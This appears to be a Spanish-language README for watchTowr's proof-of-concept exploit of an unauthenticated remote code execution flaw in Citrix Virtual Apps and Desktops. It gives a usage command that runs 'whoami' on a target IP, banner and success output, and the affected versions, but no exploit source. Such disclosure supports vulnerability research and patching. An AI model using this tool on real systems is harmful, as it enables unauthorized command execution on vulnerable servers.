
Citrix Virtual Apps and Desktops (XEN) RCE no autenticado
Citrix Virtual Apps and Desktops (XEN) Ejecución remota de código no autenticada
Consulta nuestra publicación del blog para obtener detalles técnicos
https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
CVE-xxxx-xxxxx.py
(*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr
- Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
CVEs: [CVE-xxxx-xxxxx]
[INFO] Command sent to 192.168.1.120 successfully!
Cualquier versión desde Citrix Virtual Apps and Desktops 7 2402 LTSR y anteriores son vulnerables, más detalles en el aviso de Citrix
Este exploit fue escrito por Sina Kheirkhah (@SinSinology) de watchTowr (@watchtowrcyber)
Para conocer las últimas investigaciones de seguridad, sigue al equipo de laboratorios de watchTowr